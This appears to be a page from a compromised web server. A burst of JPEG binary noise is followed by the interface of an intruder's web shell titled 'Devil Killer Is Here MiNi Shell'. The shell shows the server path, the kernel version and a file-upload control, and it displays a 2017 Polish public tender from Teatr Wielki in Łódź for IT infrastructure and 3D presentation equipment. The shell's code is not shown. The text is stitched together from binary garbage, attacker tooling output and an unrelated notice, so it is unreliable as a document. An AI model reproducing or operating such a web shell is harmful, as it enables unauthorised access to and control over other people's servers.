JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20170331/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20170331/56197-N-2017.html

<BR/><p>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia (jeżeli dotyczy):  </p><a class='base announcementNumber' href='http://www.operalodz.com/Zamowienia_publiczne,30' target='_blank'>http://www.operalodz.com/Zamowienia_publiczne,30</a><br/><hr class='linkedItemsSeparator' /><div class="divRow_xforms"><div>
              Ogłoszenie nr 56197 - 2017
              z dnia 2017-03-31 r.
            </div><div class="headerMedium_xforms" style="text-align: center">Łódź: Przedmiotem zamówienia jest dostawa wraz z montażem infrastruktury informatycznej oraz urządzenia do tworzenia prezentacji 3D, realizowana w ramach projektu pn.: Digitalizacja i upowszechnienie zasobów artystycznych Teatru Wielkiego w Łodzi, współfinansowanego przez Unię Europejską z Europejskiego Funduszu Rozwoju Regionalnego w ramach Regionalnego Programu Operacyjnego Województwa Łódzkiego 2014-2020  Oś priorytetowa VII Infrastruktura dla usług społecznych, Działanie VII.1 Technologie informacyjno-komunikacyjne, Poddziałanie VII.1.2 Technologie informacyjno-komunikacyjne (Etap I  Zadanie 2 Zakup infrastruktury informatycznej Zadanie 3  Zakup oprogramowania, licencji, baz danych oraz Zadanie 5 Zakup usług informatycznych, digitalizacji, serwisowych)<br />
            OGŁOSZENIE O ZAMÓWIENIU -
            
              Dostawy
            </div><div><b>Zamieszczanie ogłoszenia:</b>
              obowiązkowe
            </div><div><b>Ogłoszenie dotyczy:</b>
              zamówienia publicznego
            </div><div><b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b><br /><div style="padding-left: 20px">
                tak
              </div><br /><b>Nazwa projektu lub programu</b><br />Digitalizacja i upowszechnienie zasobów artystycznych Teatru Wielkiego w Łodzi, współfinansowanego przez Unię Europejską z Europejskiego Funduszu Rozwoju Regionalnego w ramach Regionalnego Programu Operacyjnego Województwa Łódzkiego 2014-2020  Oś priorytetowa VII Infrastruktura dla usług społecznych, Działanie VII.1 Technologie informacyjno-komunikacyjne, Poddziałanie VII.1.2 Technologie informacyjno-komunikacyjne </div><div><b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje  społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %)
            <br /></div><div class="headerLarge_xforms" style="text-align: left"><u>SEKCJA I: ZAMAWIAJĄCY</u></div><div style="padding-left: 20px"><b>Postępowanie przeprowadza centralny zamawiający </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b><br /><b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów:
            <br /><br /><b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej  mające zastosowanie krajowe prawo zamówień publicznych:</b><br /><b>Informacje dodatkowe:</b><br /></div><div style="padding-left: 20px;"><div style="text-align: left"><b>I. 1) NAZWA I ADRES: </b>Teatr Wielki w Łodzi, krajowy numer identyfikacyjny
              27919500000, ul.
              Plac Dąbrowskiego 
              1,
              90249  
              Łódź, woj.
              łódzkie, państwo
              Polska, tel.
              426 339 960, e-mail
              teatr@teatr-wielki.lodz.pl, faks
              426 319 552.
              <br />
              Adres strony internetowej (URL): http://www.operalodz.com<br /><br /></div><div style="text-align: left"><b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b>
                Inny: Samorządowa instytucja kultury</div><div style="text-align: left"><b>
                I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>:
              </b><div style="padding-left: 20px">
                Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym
                w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających):
                <br /></div></div><div style="text-align: left"><b>
                I.4) KOMUNIKACJA:
              </b><br /><b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b><div style="padding-left: 20px">
                  nie
                <br /></div><br /><b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b><div style="padding-left: 20px">
                  tak
                <br />http://www.operalodz.com/Zamowienia_publiczne,30</div><br /><b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b><div style="padding-left: 20px">
                  nie
                <br /></div><br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b><br /><b>Elektronicznie</b><div style="padding-left: 20px">
                  nie
                <br />
                adres
                <br /></div><br /><div style="padding-left: 20px"><b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  nie
                <br /><b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  tak
                  <br />
                  Inny sposób:
                  <br />pisemnie<br />
                Adres:
                <br />Teatr Wielki w Łodzi, 90-249 Łódź, pl. Dąbrowsiego,wejście od ulicy Jarcza, parter, seretariat</div><br /><b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b><div style="padding-left: 20px">
                  nie
                <br />
                Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL)
                <br /></div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA II: PRZEDMIOT ZAMÓWIENIA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><br /><b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b>Przedmiotem zamówienia jest dostawa wraz z montażem infrastruktury informatycznej oraz urządzenia do tworzenia prezentacji 3D, realizowana w ramach projektu pn.: Digitalizacja i upowszechnienie zasobów artystycznych Teatru Wielkiego w Łodzi, współfinansowanego przez Unię Europejską z Europejskiego Funduszu Rozwoju Regionalnego w ramach Regionalnego Programu Operacyjnego Województwa Łódzkiego 2014-2020  Oś priorytetowa VII Infrastruktura dla usług społecznych, Działanie VII.1 Technologie informacyjno-komunikacyjne, Poddziałanie VII.1.2 Technologie informacyjno-komunikacyjne (Etap I  Zadanie 2 Zakup infrastruktury informatycznej Zadanie 3  Zakup oprogramowania, licencji, baz danych oraz Zadanie 5 Zakup usług informatycznych, digitalizacji, serwisowych)<br /><b>Numer referencyjny: </b>DP/PN/04/2017<br /><b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b><br /><div style="padding-left: 20px; text-align: justify">
                  nie
                </div><br /><b>II.2) Rodzaj zamówienia: </b>
                dostawy
              <br /><b>II.3) Informacja o możliwości składania ofert częściowych</b><br />
              Zamówienie podzielone jest na części:
              <br /><div style="padding-left: 20px">
                  Tak
                  <br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu można składać w odniesieniu do:</b><br />
                    wszystkich części
                  <br /></div><br /><br /><b>
                II.4) Krótki opis przedmiotu zamówienia
              </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:
              </b>1.	Przedmiotem niniejszego zamówienia jest dostawa wraz z montażem infrastruktury informatycznej oraz urządzenia do tworzenia prezentacji 3D, realizowana w ramach projektu pn.: Digitalizacja i upowszechnienie zasobów artystycznych Teatru Wielkiego w Łodzi, współfinansowanego przez Unię Europejską z Europejskiego Funduszu Rozwoju Regionalnego w ramach Regionalnego Programu Operacyjnego Województwa Łódzkiego 2014-2020  Oś priorytetowa VII Infrastruktura dla usług społecznych, Działanie VII.1 Technologie informacyjno-komunikacyjne, Poddziałanie VII.1.2 Technologie informacyjno-komunikacyjne (Etap I  Zadanie 2 Zakup infrastruktury informatycznej Zadanie 3  Zakup oprogramowania, licencji, baz danych oraz Zadanie 5 Zakup usług informatycznych, digitalizacji, serwisowych) z podziałem na 5 (pięć) części.
2.	Oferta może obejmować całość zamówienia. Zamawiający dopuszcza składanie ofert częściowych na poszczególne Części. W ramach Części Zamawiający wymaga złożenia pełnej oferty (tj. na 100% pozycji w Części):
2.1.	Część 1  urządzenia skanujące;
2.2.	Część 2  infrastruktura informatyczna do masowego przechowywania i przenoszenia danych wraz z oprogramowaniem;
2.3.	Część 3  sprzęt komputerowy (2 zestawy) wraz z oprogramowaniem - system operacyjny;
2.4.	Część 4  oprogramowanie użytkowe;
2.5.	Część 5  urządzenie do tworzenia prezentacji 3D i 360 stopni kostiumów.
3.	W ramach etapu I przewiduje się dostawę wraz z montażem następującej infrastruktury  informatycznej:
3.1.	Część 1   Urządzenia skanujące:
a)	skaner płaski  1 szt.;
3.2.	Część 2   infrastruktura informatyczna do masowego przechowywania i przenoszenia danych wraz z oprogramowaniem: 
a)	serwer  1 szt. 
	oprogramowanie do obsługi serwera  1 licencja,
	oprogramowanie do obsługi serwera, system operacyjny - 1 licencja,
b)	macierz dyskowa z dyskami  1 komplet;
c)	switch z obudową  1 szt.;
d)	szafa rack  1 szt.;
e)	dyski do przenoszenia danych  4 szt.
3.3.	Część 3   sprzęt komputerowy (2 zestawy)  wraz z oprogramowaniem - system operacyjny:
a)	sprzęt komputerowy dla administratora  1 kpl., 
	oprogramowanie do obsługi sprzętu komputerowego - system operacyjny dla administratora (licencja bezterminowa) 1 szt.;
b)	sprzęt komputerowy do czytelni  1 kpl.,
	oprogramowanie do obsługi sprzętu komputerowego - system operacyjny dla czytelni (licencja bezterminowa) 1 szt.;
3.4.	Część 4  oprogramowanie użytkowe:
a)	oprogramowanie biurowe do komputera dla administratora (licencja)  1 szt.;
b)	oprogramowanie biurowe do komputera do czytelni (licencja)  1 szt.;
c)	oprogramowanie do obróbki zdjęć dla administratora (licencja)  1 szt.;
d)	oprogramowanie do tworzenia grafiki dla administratora (program)  1 szt.
3.5.	Część 5  urządzenie do tworzenia prezentacji 3D i 360 stopni kostiumów:
a)	urządzenia bazowe do tworzenia prezentacji 3D i 360 stopni kostiumów, 1 kpl;
b)	aparat fotograficzny 1 szt.
c)	materiały eksploatacyjne 1 kpl.
d)	oprogramowanie do urządzenia do tworzenia prezentacji 3D i 360 stopni kostiumów,  1 szt.
e)	opieka serwisowa, instruktaż pracowników 1 kpl. 
4.	Szczegółowy opis przedmiotu zamówienia zawarty jest w Załączniku nr 4 do SIWZ.
5.	Dostawa będzie wykonywana zgodnie z warunkami określonymi przez Zamawiającego we wzorze umowy, który stanowi Załącznik nr 3 do SIWZ.
6.	Ewentualne użycie w SIWZ określeń i nazw własnych ma jedynie charakter przykładowy i służy określeniu klasy, jakości, parametrów, cech i funkcjonalności sprzętu / oprogramowania. Jeśli w opisie przedmiotu zamówienia znajdują się wskazania znaków towarowych, patentów lub pochodzenia, Wykonawca może zaoferować sprzęt / oprogramowanie równoważne. Zamawiający wymaga, aby dostarczony sprzęt / oprogramowanie, o ile są inne, posiadały parametry jakościowe i techniczne klasę, cechy i funkcjonalność nie gorsze, niż określone w opisie przedmiotu zamówienia. Wykazanie równoważności zaoferowanego sprzętu / oprogramowania spoczywa na Wykonawcy (poprzez przedstawienie stosownych dowodów  np. specyfikacji technicznych zawierających nazwę części, zestawienie parametrów, cech i funkcjonalności proponowanego równoważnego sprzętu / oprogramowania).
7.	Numer CPV dotyczący przedmiotu zamówienia: 30.20.00.00-1 (urządzenia komputerowe).
8.	Zamawiający nie przewiduje zawarcia umowy ramowej.
9.	Zamawiający nie przewiduje udzielenia zamówień uzupełniających.
10.	Zamawiający nie dopuszcza składania ofert wariantowych.
11.	Zamawiający nie przewiduje aukcji elektronicznej.
12.	Zamawiający nie przewiduje udzielania przedpłat i zaliczek na realizację niniejszego zamówienia.
13.	Podwykonawcy:
13.1.	Zamawiający dopuszcza powierzenie wykonania części niniejszego zamówienia podwykonawcom. Wykonawca jest zobowiązany umieścić w składanej ofercie informację o części zamówienia, które Wykonawca zamierza powierzyć podwykonawcom. Brak w ofercie powyższej informacji będzie rozumiane jako wykonanie całego przedmiotu zamówienia samodzielnie.
13.2.	Zamawiający nie wymaga osobistego wykonania przez Wykonawcę kluczowych części niniejszego zamówienia.
14.	Zamówienie jest realizowane zgodnie z Wytycznymi w zakresie realizacji zasady równości szans i niedyskryminacji, w tym dostępności dla osób z niepełnosprawnościami oraz zasady równości szans kobiet i mężczyzn w ramach funduszy unijnych na lata 2014-2020.
15.	Przedmiot umowy jest realizowany zgodnie z umową nr UDA-RPLD.07.01.02-10-0007/16-00, zawartą w dniu 6 września 2016 roku, pomiędzy Województwem Łódzkim jako Instytucją Zarządzającą a Teatrem Wielkim w Łodzi, o dofinansowanie projektu pn.: Digitalizacja i upowszechnienie zasobów artystycznych Teatru Wielkiego w Łodzi, zakwalifikowanego do dofinansowania na podstawie Uchwały nr 668/15 Zarządu Województwa Łódzkiego z dnia 23 czerwca 2015 roku w ramach Regionalnego Programu Operacyjnego Województwa Łódzkiego 2014-2020   Oś priorytetowa VII Infrastruktura dla usług społecznych, Działanie VII.1 Technologie informacyjno-komunikacyjne, Poddziałanie VII.1.2 Technologie informacyjno-komunikacyjne.
<br /><br /><b>II.5) Główny kod CPV: </b>30200000-1<br /><br /><b>
                II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>:
              
              <br />
              Wartość bez VAT:
              <br />
              Waluta:
              <br /><div style="padding-left: 20px"><br /><i>(w przypadku umów ramowych lub dynamicznego systemu zakupów  szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i></div><br /><b>
                II.7)
                Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7  lub w art. 134 ust. 6 pkt 3  ustawy Pzp:
              </b>
                nie
              <br /><b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b><div style="padding-left: 20px">
                    Okres w dniach: 30<br /></div><div style="padding-left: 20px">
                    Okres w dniach: 45<br /></div><br /><b>II.9) Informacje dodatkowe: </b>Termin wykonania zamówienia:
1)	do 30 dni roboczych od podpisania umowy  dotyczy Części 1 -4;
2)	do 45 dni roboczych od podpisania umowy  dotyczy Części 5.
</div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>
                III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU
              </b><br /><div style="padding-left: 20px"><b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b><br />
                Określenie warunków:
                1.	O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy nie podlegają wykluczeniu oraz spełniają warunki udziału w postępowaniu dotyczące:
1.1.	kompetencji lub uprawnień do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów;
1.2.	sytuacji ekonomicznej lub finansowej;
1.3.	zdolności technicznej lub zawodowej.
2.	Zamawiający uzna, że Wykonawca spełnia warunek określony w  art. 22 ust. 1b, pkt 3 uPzp, jeżeli w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy  w tym okresie, Wykonawca należycie wykonał lub wykonuje:
2.1.	co najmniej dwie dostawy sprzętu komputerowego o wartości nie mniejszej niż 21.000,00 (dwadzieścia jeden tysięcy) zł brutto każda (w przypadku Wykonawców składających ofertę łącznie na Części 2 i 3), lub:
a)	w przypadku Wykonawców składających ofertę w Części 2  co najmniej 16.000,00 (szesnaście tysięcy) zł brutto każda,
b)	w przypadku Wykonawców składających ofertę w Części 3  co najmniej 5.000,00 (pięć tysięcy) zł brutto każda;
2.2.	co najmniej dwie dostawy urządzeń do prezentacji 3D o wartości nie mniejszej niż 20.000,00 (dwadzieścia tysięcy) zł brutto każda (w przypadku Wykonawców składających ofertę 
w Części 5);
2.3.	w przypadku Wykonawców składających ofertę w Części 1  Zamawiający nie określa warunku;
2.4.	w przypadku Wykonawców składających ofertę w Części 4  Zamawiający nie określa warunku.
	UWAGA 1: W przypadku dostaw nadal wykonywanych należy uwzględnić wartość faktycznie zrealizowanej części zamówienia do dnia składania ofert (nie wartość całej umowy).
	UWAGA 2: Powyższy warunek dotyczy wyłącznie Wykonawców składających ofertę w Części 2 i/lub w Części 3 i/lub w Części 5. Dla Wykonawców składających ofertę w Części 1 i/lub w Części 4 Zamawiający nie określa warunku zdolności technicznej lub zawodowej.
3.	Wykonawca może w celu potwierdzenia spełniania warunków udziału w postępowaniu, w stosownych  sytuacjach oraz w odniesieniu do konkretnego zamówienia, lub jego części, polegać na zdolnościach technicznych lub zawodowych lub sytuacji finansowej lub ekonomicznej innych podmiotów, niezależnie od charakteru prawnego łączących go z nim stosunków prawnych.
4.	Wykonawca, który polega na zdolnościach lub sytuacji innych podmiotów, musi udowodnić Zamawiającemu, że realizując zamówienie, będzie dysponował niezbędnymi zasobami tych podmiotów, w szczególności przedstawiając zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na potrzeby realizacji zamówienia.
5.	Zamawiający oceni, czy udostępniane Wykonawcy przez inne podmioty zdolności techniczne lub zawodowe lub ich sytuacja finansowa lub ekonomiczna, pozwalają na wykazanie przez Wykonawcę spełnienie warunków udziału w postępowaniu oraz zbada, czy nie zachodzą wobec tego podmiotu podstawy wykluczenia, o których mowa w art. 24 ust. 1 pkt 13  22 uPzp oraz o których mowa w Rozdziale 5 SIWZ.
6.	Jeżeli zdolności techniczne lub zawodowe podmiotu, na którego zdolnościach polega Wykonawca nie potwierdzają spełnienia przez Wykonawcę warunków udziału w postępowaniu lub zachodzą wobec tych podmiotów podstawy wykluczenia, Zamawiający żąda, aby Wykonawca w terminie określonym przez Zamawiającego:
6.1.	zastąpił ten podmiot innym podmiotem lub podmiotami,
6.2.	zobowiązał się do osobistego wykonania odpowiedniej części zamówienia, jeżeli wykaże zdolności techniczne lub zawodowe, o których mowa w Rozdziale 4 SIWZ.
7.	W celu oceny, czy Wykonawca polegając na zdolnościach innych podmiotów na zasadach określonych w art. 22a uPzp będzie dysponował niezbędnymi zasobami w stopniu umożliwiającym należyte wykonanie zamówienia publicznego oraz oceny, czy stosunek łączący Wykonawcę z tymi podmiotami gwarantuje rzeczywisty dostęp do ich zasobów, Zamawiający może żądać dokumentów, które określają w szczególności:
7.1.	zakres dostępnych Wykonawcy zasobów innego podmiotu,
7.2.	sposób wykorzystania zasobów innego podmiotu przez Wykonawcę przy wykonywaniu zamówienia publicznego,
7.3.	zakresu i okresu udziału innego podmiotu przy wykonywaniu zamówienia publicznego,
7.4.	czy podmiot, na zdolnościach którego Wykonawca polega w odniesieniu do warunków udziału w postępowaniu dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia, zrealizuje usługi, których wskazane zdolności dotyczą.
8.	W przypadku wspólnego ubiegania się dwóch lub więcej Wykonawców o udzielenie niniejszego zamówienia, warunki określone w podpunktach od 1.1. do 1.3., Wykonawcy muszą spełnić łącznie.
9.	Dla potrzeb oceny spełniania warunków określonych powyżej, jeśli wartości zostaną podane w walutach innych niż PLN, Zamawiający przyjmie średni kurs PLN do tej waluty podawany przez NBP na dzień zamieszczenia ogłoszenia w Biuletynie Zamówień Publicznych.
<br />
                Informacje dodatkowe
                <br /><b>III.1.2)  Sytuacja finansowa lub ekonomiczna  </b><br />
                Określenie warunków:
                <br />
                Informacje dodatkowe
                <br /><b>III.1.3) Zdolność techniczna lub zawodowa </b><br />
                Określenie warunków:
                Zamawiający uzna, że Wykonawca spełnia warunek określony w  art. 22 ust. 1b, pkt 3 uPzp, jeżeli w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy  w tym okresie, Wykonawca należycie wykonał lub wykonuje:
1.	co najmniej dwie dostawy sprzętu komputerowego o wartości nie mniejszej niż 21.000,00 (dwadzieścia jeden tysięcy) zł brutto każda (w przypadku Wykonawców składających ofertę łącznie na Części 2 i 3), lub:
a)	w przypadku Wykonawców składających ofertę w Części 2  co najmniej 16.000,00 (szesnaście tysięcy) zł brutto każda,
b)	w przypadku Wykonawców składających ofertę w Części 3  co najmniej 5.000,00 (pięć tysięcy) zł brutto każda;
2.	co najmniej dwie dostawy urządzeń do prezentacji 3D o wartości nie mniejszej niż 20.000,00 (dwadzieścia tysięcy) zł brutto każda (w przypadku Wykonawców składających ofertę 
w Części 5);
3.	w przypadku Wykonawców składających ofertę w Części 1  Zamawiający nie określa warunku;
4.	w przypadku Wykonawców składających ofertę w Części 4  Zamawiający nie określa warunku.
	UWAGA 1: W przypadku dostaw nadal wykonywanych należy uwzględnić wartość faktycznie zrealizowanej części zamówienia do dnia składania ofert (nie wartość całej umowy).
	UWAGA 2: Powyższy warunek dotyczy wyłącznie Wykonawców składających ofertę w Części 2 i/lub w Części 3 i/lub w Części 5. Dla Wykonawców składających ofertę w Części 1 i/lub w Części 4 Zamawiający nie określa warunku zdolności technicznej lub zawodowej.
<br />
                Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób:
                
                  nie
                <br />
                Informacje dodatkowe:
                </div><b>
                III.2) PODSTAWY WYKLUCZENIA
              </b><br /><div style="padding-left: 20px"><b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1  ustawy Pzp</b><br /><b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b>
                  tak
                  <br />
                  Zamawiający przewiduje następujące fakultatywne podstawy wykluczenia:
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 1 ustawy Pzp)
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 2 ustawy Pzp)
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 4 ustawy Pzp)
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 8 ustawy Pzp)
                <br /></div><b>
                III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI
              </b><br /><div style="padding-left: 20px"><b>
                  Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu
                </b><br />
                  tak
                <br /><b>
